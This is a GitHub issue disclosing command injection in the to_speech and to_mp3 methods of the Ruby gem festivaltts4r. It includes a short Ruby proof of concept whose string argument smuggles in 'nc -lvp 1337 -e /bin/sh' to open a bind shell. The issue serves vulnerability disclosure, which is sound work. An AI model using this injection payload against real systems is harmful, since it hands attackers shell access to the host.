Skip to content

Command Injection #1

Open
Open
@bcoles

Description

@bcoles

The to_speech and to_mp3 methods allow injection of arbitrary operating system commands. This may be problematic in the event user input is supplied to these methods.

Proof of concept:

#!/usr/bin/env ruby
require "rubygems"
require "festivaltts4r"

'";nc -lvp 1337 -e /bin/sh;echo "pwned'.to_speech
'";nc -lvp 1337 -e /bin/sh;echo "pwned'.to_mp3('something.mp3')
$ ./asdf.rb 
listening on [any] 1337 ...

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions